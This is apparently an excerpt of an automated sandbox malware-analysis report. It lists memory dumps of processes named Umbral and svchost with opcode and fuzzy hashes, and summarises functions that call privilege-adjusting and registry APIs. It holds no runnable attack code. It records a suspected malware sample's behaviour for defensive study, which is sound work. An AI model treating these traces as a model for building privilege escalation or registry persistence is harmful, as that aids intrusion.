                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 3CO_^
                                                                        • API String ID: 0-3937211734
                                                                        • Opcode ID: a3a5ab9c1d28fbd5292e80512ad0d8089bdc51bfd47631454a9374f251ac9da1
                                                                        • Instruction ID: 9f9d7083c22132c9717ef703c44f1e19d899247b1e20fc25f0573b367fe5208d
                                                                        • Opcode Fuzzy Hash: a3a5ab9c1d28fbd5292e80512ad0d8089bdc51bfd47631454a9374f251ac9da1
                                                                        • Instruction Fuzzy Hash: B7F0BE20E5E58A07FB7933B418363F82A419F89718F5A04BCD46D4B2E3DE3E69818291
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9182f6ed13d2c267b7cbfb6a4c74792ff510aa3eb99e3a7772f3d5ec79a8ff58
                                                                        • Instruction ID: 5df0ee9089d278d46458b8f07677b4a7aee33c56fce0ea31895eee71c818b466
                                                                        • Opcode Fuzzy Hash: 9182f6ed13d2c267b7cbfb6a4c74792ff510aa3eb99e3a7772f3d5ec79a8ff58
                                                                        • Instruction Fuzzy Hash: 77412842F1EEC66FF32553B948391A57F90FF66B14B0E41BBC0B8460D3DD28A9058292
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 72eeae83a9985ebdfb9c2a8dc4e421e645bdee29aa015f942e5b883b8e642f7d
                                                                        • Instruction ID: ecfe039a108e55dd775ceefc049fd54a8a50da1790d566e8f29a078b7472bbe5
                                                                        • Opcode Fuzzy Hash: 72eeae83a9985ebdfb9c2a8dc4e421e645bdee29aa015f942e5b883b8e642f7d
                                                                        • Instruction Fuzzy Hash: 1271D861B19E4D4FE7A8EB6C58697B867D2EFAC310F05017BE45DC32D6DE38A8414381
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 081e2cbb33934ae7ccdcc7110c8ff15fe46585ebff16eeec2098990e47343178
                                                                        • Instruction ID: 7c4cec0cda3374c4e8964b712d34ac1fbab49fe0676268be7c053de874ebc23e
                                                                        • Opcode Fuzzy Hash: 081e2cbb33934ae7ccdcc7110c8ff15fe46585ebff16eeec2098990e47343178
                                                                        • Instruction Fuzzy Hash: 6001C412F0ED890FE7A4A7BC6C66AB467C1DF9D221B4901BAE05CC32EBDC286C424341
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ac0e4da4415fca69c920d965ff6daf9790d77c631f757581da6f46e601cf1256
                                                                        • Instruction ID: b6bbf0a9af40a82a78f29924780865c71670f6a47af1ea32aeee0f351739f10a
                                                                        • Opcode Fuzzy Hash: ac0e4da4415fca69c920d965ff6daf9790d77c631f757581da6f46e601cf1256
                                                                        • Instruction Fuzzy Hash: 0E113F31B18A194FEB98EB2898618BE7BE1FF88310B410575D41CC32DADE34A941C381
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1656833444.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b880000_KvS2rT08PQ.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: db7ab0b5e82b664264783a9e9524098895e9c5d717ef43bc63454dd22f314e7b
                                                                        • Instruction ID: 6ffd8cbf6958f5f87489e7694c9ad53478a3eb97f8b62a2f29d0385a7e645c09
                                                                        • Opcode Fuzzy Hash: db7ab0b5e82b664264783a9e9524098895e9c5d717ef43bc63454dd22f314e7b
                                                                        • Instruction Fuzzy Hash: 63018622F1ED4D0BF7B4B6FD2C6A6B962C5DB9C221B550176E42DC32EADC285C824381
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$(
                                                                        • API String ID: 0-1942707054
                                                                        • Opcode ID: c3c6a4c6007e18a5cf58c09ada29b806cba721daaa3befe5f42021a1af9ac65c
                                                                        • Instruction ID: 179d6f9e66b105f659332372ecbf7f62a1c60f1b498f8a1ca6eb3e13a051c3ca
                                                                        • Opcode Fuzzy Hash: c3c6a4c6007e18a5cf58c09ada29b806cba721daaa3befe5f42021a1af9ac65c
                                                                        • Instruction Fuzzy Hash: F9C13931E0D69E4FEBA4DB7488626B97BE1FF49310F09017ED05DC72E2DA285906CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: yR_H
                                                                        • API String ID: 0-493830893
                                                                        • Opcode ID: 792725120b244c5503b8ae6b171340eddee5b8579c1a7d1d1679a203efbf7929
                                                                        • Instruction ID: 57e3bbe094b5f2f1fc32b4dbe9a9de6e798b6099a3595285c633b5e0dbd68096
                                                                        • Opcode Fuzzy Hash: 792725120b244c5503b8ae6b171340eddee5b8579c1a7d1d1679a203efbf7929
                                                                        • Instruction Fuzzy Hash: DFA11971F1DA5D0FDB64EB6C9855ABDB7E1EF9D310F0102BAE04DC3292DE24A9424B81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: yR_H
                                                                        • API String ID: 0-493830893
                                                                        • Opcode ID: 0a0d67d8297dcc23ee8cc13ea65b220b3ef8b185a7430897f38fc27efe23eeee
                                                                        • Instruction ID: dba8a0f80f33c9846cf8d98f90b4a17b92dc44d2f6620d1a3153d0a616a58bce
                                                                        • Opcode Fuzzy Hash: 0a0d67d8297dcc23ee8cc13ea65b220b3ef8b185a7430897f38fc27efe23eeee
                                                                        • Instruction Fuzzy Hash: 8EA1F931F1DA5D0FDB64EB6C9855ABDB7E1EF9D310F0002BAE44DC3296DE2469424B81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e3d617b0fe1fc1be8d1d644ae30ad08f2b314bfc0f7dff7cefc9cf4a807b54e
                                                                        • Instruction ID: 95aa91a450f2dba659546079371d7e7a568ef15910ac83ac06c8fd9ee8a1a5ee
                                                                        • Opcode Fuzzy Hash: 7e3d617b0fe1fc1be8d1d644ae30ad08f2b314bfc0f7dff7cefc9cf4a807b54e
                                                                        • Instruction Fuzzy Hash: 23A10D31B1E69A4FEB65EFB888712B97791FF4A300F0501BAD4598B1E7DD28B9018781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f9dba7997e712b91e1dd9d8eb086fff0c47c418efd92fd527c7a74bc9c7f64d2
                                                                        • Instruction ID: d0729dc00a5271bd015d03f31e80f2cc1a9270ed347dc4e354dcd8243d753366
                                                                        • Opcode Fuzzy Hash: f9dba7997e712b91e1dd9d8eb086fff0c47c418efd92fd527c7a74bc9c7f64d2
                                                                        • Instruction Fuzzy Hash: D1811931B0CE5D4FD768DFAC9865AB9B7E1EF98310F05427ED04DD32A5DE24A8428B80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f29619f15a30da237b24d5c7267ac56093af3df0c96f84c8c4c38fbfce86d7af
                                                                        • Instruction ID: 41351795d9d8b4c33e4029313c8e41b9c35a65c4f9c7803d6ebb3cfc478ea2bf
                                                                        • Opcode Fuzzy Hash: f29619f15a30da237b24d5c7267ac56093af3df0c96f84c8c4c38fbfce86d7af
                                                                        • Instruction Fuzzy Hash: 3251CE31A0CB5C4FDB59DF5888566EDBBF1FB59310F0082ABD449D7296CA34A845CB82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d0f9fad6ddcc60edbf880ff326674bae0e4858884beb53a4a4a1053f26ea9fca
                                                                        • Instruction ID: 0ac29427f6aba45aa12039b56e916b06ceaacf76b3cc150bd1360cbfd8ccd085
                                                                        • Opcode Fuzzy Hash: d0f9fad6ddcc60edbf880ff326674bae0e4858884beb53a4a4a1053f26ea9fca
                                                                        • Instruction Fuzzy Hash: 8B51E571F19A5D4BEF58DBA888656AD77F2FF9C300F05017AD04DE72A2CA3469018B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f914bb7fbda94a5b6475add6b52d4fdc7ec0adb81a98722ac84a0cfc6804b2b
                                                                        • Instruction ID: 40bf1b456324e18999443b698003e90bfcd41efc54f365651d48f9d66e725744
                                                                        • Opcode Fuzzy Hash: 9f914bb7fbda94a5b6475add6b52d4fdc7ec0adb81a98722ac84a0cfc6804b2b
                                                                        • Instruction Fuzzy Hash: C7712F70E1565D9FEB94EFB4C8656ECBBB1EF49300F4004B9D059AB2A2CE792985CF40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dc279a863d2ec92cb646586ef24e3ca9fc52aae6a2d35d622a71fabb6ceea971
                                                                        • Instruction ID: 5307658a5e46f7aa266036ca5c16dc7ed6d7f78f5c689f4122cd0af0aecbbf66
                                                                        • Opcode Fuzzy Hash: dc279a863d2ec92cb646586ef24e3ca9fc52aae6a2d35d622a71fabb6ceea971
                                                                        • Instruction Fuzzy Hash: 8C517070A14A5E8FDB94DF68C854AEA73F2FF58304F504A69E429C72E5CB34E951CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b0583d113638f9d6fe698975ceddcb15899f954faf24f00d044611a67fb04178
                                                                        • Instruction ID: e74471b5b9f842743a79d84eac11073a7de27f498bcb7b5868c9a0783bfbd3c5
                                                                        • Opcode Fuzzy Hash: b0583d113638f9d6fe698975ceddcb15899f954faf24f00d044611a67fb04178
                                                                        • Instruction Fuzzy Hash: ED517370619A8E4FDF98DF2888B0A6537A1FF5D304B1506ADE46DCB2D2DB35E912CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b70605e747510c58726501c7ebd05d390aa8ef6c6f2e8153ca1e728af59fd1a7
                                                                        • Instruction ID: a26ade007213a041f111a9aa6d93532a28e32f6ac64d431fc3934b6e920ddf48
                                                                        • Opcode Fuzzy Hash: b70605e747510c58726501c7ebd05d390aa8ef6c6f2e8153ca1e728af59fd1a7
                                                                        • Instruction Fuzzy Hash: 9C314E3165E6CE4FD7269BB868254A57FE0EF46320B0501BBD489CB063DE189902C7C1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c0a8f79560d8021cd23298e2d03ab4d259afc68d919218b46ebb2999fdc909a3
                                                                        • Instruction ID: 98565ff91df19288a979455b119148eb456047d4610eac09bad981d83c5335f5
                                                                        • Opcode Fuzzy Hash: c0a8f79560d8021cd23298e2d03ab4d259afc68d919218b46ebb2999fdc909a3
                                                                        • Instruction Fuzzy Hash: 56212521B28A5D0FD7A4EB7C546A67577D2EB8D610B0501FAE40CC32A3DC18AC0287C1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 64aec3a956e4b6b1c89fd22ee945d3466624286c78470f52c6da885e508eb832
                                                                        • Instruction ID: c4110e1f7588c30c06d9f743275433b2e26a24a6300b1ce6d0795d0c29211a15
                                                                        • Opcode Fuzzy Hash: 64aec3a956e4b6b1c89fd22ee945d3466624286c78470f52c6da885e508eb832
                                                                        • Instruction Fuzzy Hash: 8531C020A0959E4FD755EBB8C475ABDBBE1EF09300F0904B8D05AC72F3CE286941CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a0a4e2db963f94a0fc42f42ddf041fef043ce3e70f66ba1f88c382d0a67a973a
                                                                        • Instruction ID: 2ee76f9e975ff3d4c11a64dda6f1f02b691faf21f8d3b7ffaf86bbc689ccd573
                                                                        • Opcode Fuzzy Hash: a0a4e2db963f94a0fc42f42ddf041fef043ce3e70f66ba1f88c382d0a67a973a
                                                                        • Instruction Fuzzy Hash: C0112921F28D2D0FE6A4FB7C546B67973C2EB8C650F0506BAE40DC32A6EC14AC4147C1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%


                                                                        Execution Graph

                                                                        Execution Coverage: 21.9%
                                                                        Dynamic/Decrypted Code Coverage: 100%
                                                                        Signature Coverage: 3.2%
                                                                        Total number of Nodes: 95
                                                                        Total number of Limit Nodes: 5

Control-flow Graph

Control-flow graph for the function at 5cc4298 (rendered graph omitted; legend: Executed / Not Executed). Basic blocks span 5cc4298-5cc715f, with internal calls to 5cc4210 and 5cc4278.
Strings
Memory Dump Source
• Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
Similarity
• API ID:
• String ID: @$\O(l$2(l
• API String ID: 0-2507128402
• Opcode ID: db25a7bd09ab0dcfbd76d8f6d1657400d670af3dedcfbf7600037a3ab9960c02
• Instruction ID: bd103cf21f3fc3fe4e757cc0c2ddba95d95e7572f76a2c4b66dad6ed4ecb5bba
• Opcode Fuzzy Hash: db25a7bd09ab0dcfbd76d8f6d1657400d670af3dedcfbf7600037a3ab9960c02
• Instruction Fuzzy Hash: C5231774A052288FDB25DF24D994BE9B7B2FB58308F0041EAD909A7394DF395E86CF41
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph for the function at 5cc4287 (rendered graph omitted; legend: Executed / Not Executed). Basic blocks span 5cc4287-5cc715f, with internal calls to 5cc4210 and 5cc4278.
Strings
Memory Dump Source
• Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
Similarity
• API ID:
• String ID: $\O(l$2(l
• API String ID: 0-2610717708
• Opcode ID: 007a7c77c6703ab33a417012152ddcf67dec32bf7c6fe02667f6f21f475f1421
• Instruction ID: 75063474ee6cec62ea724a411adf93a2b0f8841e5af762c42986ac8e991629ca
• Opcode Fuzzy Hash: 007a7c77c6703ab33a417012152ddcf67dec32bf7c6fe02667f6f21f475f1421
• Instruction Fuzzy Hash: D8132974A052288FDB25DF20D994BE9B7B2FB58308F0081EAD91967394DF395E86CF41
Uniqueness
Uniqueness Score: -1.00%

APIs
• AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 06532517
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: AdjustPrivilegesToken
• String ID:
• API String ID: 2874748243-0
• Opcode ID: b8aa62e32a3bf0e4a9a443e3d2b6e56e0319841c9a1f45c1ece312d28738356d
• Instruction ID: b9e23d64f5b72594f88f1ec43b1140082235345e68f69d32b8b407975e86b9a0
• Opcode Fuzzy Hash: b8aa62e32a3bf0e4a9a443e3d2b6e56e0319841c9a1f45c1ece312d28738356d
• Instruction Fuzzy Hash: 0621A1755097809FDB228F25DC44B52BFF4EF06310F0984DAE9858F563D275EA08DB62
Uniqueness
Uniqueness Score: -1.00%

APIs
• AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 06532517
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: AdjustPrivilegesToken
• String ID:
• API String ID: 2874748243-0
• Opcode ID: 7fe15da368147c1c399cfac0f4abc3670bd51355596832934b3e932f8d796717
• Instruction ID: 377777cdcab317b1a40dea9944a8190621926c88dd2ba31b0c61763e6d2ce2f4
• Opcode Fuzzy Hash: 7fe15da368147c1c399cfac0f4abc3670bd51355596832934b3e932f8d796717
• Instruction Fuzzy Hash: BE1191715006009FEB608F55D884B66FBE4FF08610F08C4AAED468B666D375E618DFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph for the function at 5cc00b8 (rendered graph omitted; legend: Executed / Not Executed). Basic blocks span 5cc00b8-5cc01de, with resolved call targets 33ba23a, 33ba20c, 3401048, 340106e, 33ba2fe, 33ba2d2, 5cc39bf, 5cc3b18 and 5cc3801.
Strings
Memory Dump Source
• Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
Similarity
• API ID:
• String ID: 2(l$2(l$5]~i^$E]~i^
• API String ID: 0-3139636300
• Opcode ID: afe45bdc25954422d1623018e993a0fafbee513377e18c51c5a42538415a27a0
• Instruction ID: 67f3822927b658bb7f8f80bc32f1ff8fb48765862abf04d07a3ea12ede5a376a
• Opcode Fuzzy Hash: afe45bdc25954422d1623018e993a0fafbee513377e18c51c5a42538415a27a0
• Instruction Fuzzy Hash: E631E336B103585FD304EB7598917AE77AAAB82218F14886AD405DF7C1CF7DDC0A8391
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph for the function at 5cc0118 (rendered graph omitted; legend: Executed / Not Executed). Basic blocks span 5cc0118-5cc01de, with resolved call targets 5cc39bf, 5cc3b18, 3401048, 5cc3801 and 340106e.
Strings
Memory Dump Source
• Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
Similarity
• API ID:
• String ID: 2(l$2(l$5]~i^$E]~i^
• API String ID: 0-3139636300
• Opcode ID: 047ed9c276490b5337361ee4d4f42765034a465a00e121b895f7aa8f594d6f18
• Instruction ID: ca49abfffcde83db70fdb2952779150e07006d12cb9211bcb25514a322b61fdd
• Opcode Fuzzy Hash: 047ed9c276490b5337361ee4d4f42765034a465a00e121b895f7aa8f594d6f18
• Instruction Fuzzy Hash: 8911A53AB102585FD304EA75D8917FD229AD7D2218B54882AD405DFB84CF7DDC0E43E6
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph for the function at 5cc3801 (rendered graph omitted; legend: Executed / Not Executed). Basic blocks span 5cc3801-5cc41f5, with resolved call targets 5cc4298, 3401048, 5cc4287, 340106e and 5cc94b1.
Strings
Memory Dump Source
• Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
Similarity
• API ID:
• String ID: \O(l$2(l
• API String ID: 0-1462122512
• Opcode ID: eab4b87430892ebdca7c2f6c20cd848267cdbfd98c8eca0e85ce9eba9003e72d
• Instruction ID: c549c61cdd12a1d8cfed984e3920c918e31b0d11247596021936eefa8f6f1178
• Opcode Fuzzy Hash: eab4b87430892ebdca7c2f6c20cd848267cdbfd98c8eca0e85ce9eba9003e72d
• Instruction Fuzzy Hash: 63320430A002588FDB18DF74D954BEDB7B2EB59308F1045AAD40AAB794DF799E86CF40
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph for the function at 6531f6e (rendered graph omitted; legend: Executed / Not Executed). Basic blocks span 6531f6e-65320af; the block 6532063-6532076 calls RegCreateKeyExW.
APIs
• RegCreateKeyExW.KERNELBASE(?,00000E24), ref: 06532069
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 3fee35ef5fb432b3df46ad2806d0265c7f47f3d6273d1a1b3754ff9fc6cebeac
• Instruction ID: c231d98954df0f8778f5cc3a757dca2393fb37e2ceea71cb013d7af292382d15
• Opcode Fuzzy Hash: 3fee35ef5fb432b3df46ad2806d0265c7f47f3d6273d1a1b3754ff9fc6cebeac
• Instruction Fuzzy Hash: 72418E715097C06FE7238B208C50FA2BFB8EF07614F0945DAE985CB6A3D264A90DCB71
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph for the function at 653045f (rendered graph omitted; legend: Executed / Not Executed). Basic blocks span 653045f-653054a; the block 65304d6-653052e calls RegQueryValueExW.
APIs
• RegQueryValueExW.KERNELBASE(?,00000E24,?,?), ref: 06530526
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: e0142b0b9d04e78a76b4ad91022508ce1f286eb85210a093936f113519669f03
• Instruction ID: 2c862a3dd0a762f2e5470c96dccac898a164f29759e11e3783acb465f12c47cc
• Opcode Fuzzy Hash: e0142b0b9d04e78a76b4ad91022508ce1f286eb85210a093936f113519669f03
• Instruction Fuzzy Hash: 0A31BC2510E7C06FD3138B218C61A61BFB4EF47610F0E45CBD8C48F6A3D229A909C7B2
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph for the function at 33bb1e6 (rendered graph omitted; legend: Executed / Not Executed). Basic blocks span 33bb1e6-33bb2d7; the block 33bb28b-33bb29e calls RegOpenKeyExW.
APIs
• RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 033BB291
Memory Dump Source
• Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: f5f16babe0e164f207c0a92e28c5c633dc4431a374fef010cb4145f35ced1c5f
• Instruction ID: e6a8ade0cb03412575331f8d246b47ed21e5cd564c2fb93a6b215f68bcc16c94
• Opcode Fuzzy Hash: f5f16babe0e164f207c0a92e28c5c633dc4431a374fef010cb4145f35ced1c5f
